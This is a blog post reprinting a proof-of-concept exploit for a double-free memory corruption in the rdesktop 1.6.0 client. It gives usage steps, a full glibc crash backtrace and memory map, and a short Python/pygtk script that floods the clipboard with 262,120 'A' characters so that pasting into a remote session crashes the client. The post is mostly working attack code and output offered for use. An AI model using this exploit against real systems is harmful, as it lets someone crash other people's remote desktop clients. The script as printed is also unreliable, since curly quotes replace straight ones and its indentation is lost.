rdestkop 1.6.0 Memory Corruption (Copy from clipboard) PoC


Link

#rdestkop 1.6.0 Memory Corruption (Copy from clipboard) PoC
#By Dame Jovanoski (badc0re)
#
# This is the result of 262120 inserted into clipboard and coppied on remote machine
# using rdesktop 1.6.0 tested od Ubuntu 9.10
#
# Use of this exploit: python rdeskop.py
#
# And next is shift-insert(or ctrl-v) for copy
#
# This is what you get:
#
#root@bt:~# rdesktop 192.168.204.133
#WARNING: Remote desktop does not support colour depth 24; falling back to 16
#*** glibc detected *** rdesktop: double free or corruption (fasttop): 0x083f3250 ***
#======= Backtrace: =========
#/lib/tls/i686/cmov/libc.so.6[0xb7a4d454]
##/lib/tls/i686/cmov/libc.so.6(cfree+0x96)[0xb7a4f4b6]
#/usr/lib/libX11.so.6(XFree+0x1d)[0xb7b74fdd]
#rdesktop[0x805f43f]
#rdesktop[0x805a2b6]
##rdesktop[0x80630ff]
#rdesktop[0x80636d8]
#rdesktop[0x8063848]
#rdesktop[0x8064013]
#rdesktop[0x806484b]
#rdesktop[0x80663e3]
#rdesktop[0x80672b9]
#rdesktop[0x8067dbc]
#rdesktop[0x804ec2a]
#/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb79f4685]
#rdesktop[0x804ca61]
#======= Memory map: ========
#08048000-0807c000 r-xp 00000000 03:01 114747     /usr/bin/rdesktop
#0807c000-0807d000 r–p 00034000 03:01 114747     /usr/bin/rdesktop
#0807d000-0807f000 rw-p 00035000 03:01 114747     /usr/bin/rdesktop
#0807f000-08418000 rw-p 00000000 00:00 0          [heap]
#b7500000-b7521000 rw-p 00000000 00:00 0
#b7521000-b7600000 —p 00000000 00:00 0
#b769b000-b771c000 rw-p 00000000 00:00 0
#b791d000-b7925000 r-xp 00000000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7925000-b7926000 r–p 00007000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7926000-b7927000 rw-p 00008000 03:01 120953     /usr/lib/libXrender.so.1.3.0
#b7927000-b792f000 r-xp 00000000 03:01 120903     /usr/lib/libXcursor.so.1.0.2
#b792f000-b7930000 rw-p 00007000 03:01 120903     /usr/lib/libXcursor.so.1.0.2
#b7933000-b7940000 r-xp 00000000 03:01 105519     /lib/libgcc_s.so.1
#b7940000-b7941000 r–p 0000c000 03:01 105519     /lib/libgcc_s.so.1
#b7941000-b7942000 rw-p 0000d000 03:01 105519     /lib/libgcc_s.so.1
#b7942000-b794c000 r-xp 00000000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794c000-b794d000 r–p 00009000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794d000-b794e000 rw-p 0000a000 03:01 122321     /lib/tls/i686/cmov/libnss_files-2.8.90.so
#b794e000-b7957000 r-xp 00000000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7957000-b7958000 r–p 00008000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7958000-b7959000 rw-p 00009000 03:01 122325     /lib/tls/i686/cmov/libnss_nis-2.8.90.so
#b7959000-b796e000 r-xp 00000000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b796e000-b796f000 r–p 00014000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b796f000-b7970000 rw-p 00015000 03:01 122315     /lib/tls/i686/cmov/libnsl-2.8.90.so
#b7970000-b7972000 rw-p 00000000 00:00 0
#b7972000-b7979000 r-xp 00000000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b7979000-b797a000 r–p 00006000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b797a000-b797b000 rw-p 00007000 03:01 122317     /lib/tls/i686/cmov/libnss_compat-2.8.90.so
#b797b000-b797c000 rw-p 00000000 00:00 0
#b797c000-b7980000 r-xp 00000000 03:01 120909     /usr/lib/libXdmcp.so.6.0.0
#b7980000-b7981000 rw-p 00003000 03:01 120909     /usr/lib/libXdmcp.so.6.0.0
#b7981000-b7982000 rw-p 00000000 00:00 0
#b7982000-b7984000 r-xp 00000000 03:01 120891     /usr/lib/libXau.so.6.0.0
#b7984000-b7985000 rw-p 00001000 03:01 120891     /usr/lib/libXau.so.6.0.0
#b7985000-b799c000 r-xp 00000000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799c000-b799d000 r–p 00016000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799d000-b799e000 rw-p 00017000 03:01 215752     /usr/lib/libxcb.so.1.0.0
#b799e000-b799f000 r-xp 00000000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b799f000-b79a0000 r–p 00000000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b79a0000-b79a1000 rw-p 00001000 03:01 215748     /usr/lib/libxcb-xlib.so.0.0.0
#b79a1000-b79a8000 r-xp 00000000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79a8000-b79a9000 r–p 00007000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79a9000-b79aa000 rw-p 00008000 03:01 122334     /lib/tls/i686/cmov/librt-2.8.90.so
#b79aa000-b79bf000 r-xp 00000000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79bf000-b79c0000 r–p 00014000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79c0000-b79c1000 rw-p 00015000 03:01 122330     /lib/tls/i686/cmov/libpthread-2.8.90.so
#b79c1000-b79c4000 rw-p 00000000 00:00 0
#b79c4000-b79d8000 r-xp 00000000 03:01 215832     /usr/lib/libz.so.1.2.3.3
#b79d8000-b79da000 rw-p 00013000 03:01 215832     /usr/lib/libz.so.1.2.3.3
#b79da000-b79dc000 r-xp 00000000 03:01 122310     /lib/tls/i686/cmov/libdl-2.8.90.so
#b79dc000-b79dd000 r–p 00001000 03:01 122310     /lib/tls/i686/cmov/libdl-2.8.90.Aborted

from struct import *
import time
import pygtk
pygtk.require(‘2.0’)
import gtk
import sys

print “Creating expoit.”
time.sleep(1)
print “Creating explot..”
time.sleep(1)
print “Creating explot…”
buf=”\x41″*262120
try:
clipboard = gtk.clipboard_get()
text=clipboard.wait_for_text()
clipboard.set_text(buf)
clipboard.store()
print “String is copied into clipboard.”
except:
print “String cannot be copied into clipboard.”

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: